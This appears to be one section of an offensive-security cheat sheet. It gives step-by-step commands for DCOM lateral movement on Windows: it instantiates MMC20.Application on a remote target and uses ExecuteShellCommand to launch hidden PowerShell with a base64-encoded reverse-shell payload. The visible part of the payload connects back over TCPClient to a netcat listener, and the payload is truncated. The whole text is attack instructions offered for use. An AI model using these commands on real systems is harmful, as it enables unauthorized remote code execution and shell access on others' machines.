6. DCOM


DCOM MMC Reverse Shell:

  1. Generate encoded Powershell payload using python script.
  2. Start elevated powershell.
  3. Initiate MMC 2.0 application and set target ip:
$dcom = [System.Activator]::CreateInstanceGetTypeFromProgID("MMC20.Application.1","<target-ip>")
  1. Start netcat listener.
  2. Execute the application and specify process:
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...
AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")